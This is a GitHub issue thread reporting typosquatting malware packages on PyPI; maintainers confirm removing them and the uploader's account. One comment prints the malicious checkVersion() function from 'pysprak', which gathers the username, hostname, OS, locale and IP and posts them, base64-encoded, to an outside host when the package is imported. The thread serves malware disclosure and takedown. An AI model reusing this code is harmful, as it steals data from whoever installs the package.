Malware packages on PyPI #3948
Comments
|
thanks for report @zt2, please consider submitting via our published security policy in the future... reviewing now. |
|
The following packages were removed under our typosquatting policy and the user was destroyed. |
|
The malicious def checkVersion():
user_name = getpass.getuser()
hostname = socket.gethostname()
os_version = platform.platform()
if platform.system() is 'Windows':
import ctypes
import locale
dll_handle = ctypes.windll.kernel32
loc_lang = locale.getdefaultlocale()
language = ':'.join(loc_lang)
elif platform.system() is 'Linux':
loc_lang = os.popen("echo $LANG")
language = loc_lang.rea
ip = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
package='pysprak'
vid = user_name+"###"+hostname+"###"+os_version+"###"+ip+"###"+package
if sys.version_info>(3,0):
request.urlopen(r'http://numipy.openvc.org/spark.php',data='vid='.encode('utf-8')+base64.b64encode(vid.encode('utf-8')))
elif sys.version_info<(3,0):
urllib.urlopen(r'http://numipy.openvc.org/spark.php','vid='+base64.encodestring(vid))
checkVersion() |
|
@ewdurbin Maybe an issue template named "security/malware report", whose contents tell the user to submit according to policy instead, would be helpful? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Those projects will steal user information when some one use
pipto install them:The text was updated successfully, but these errors were encountered: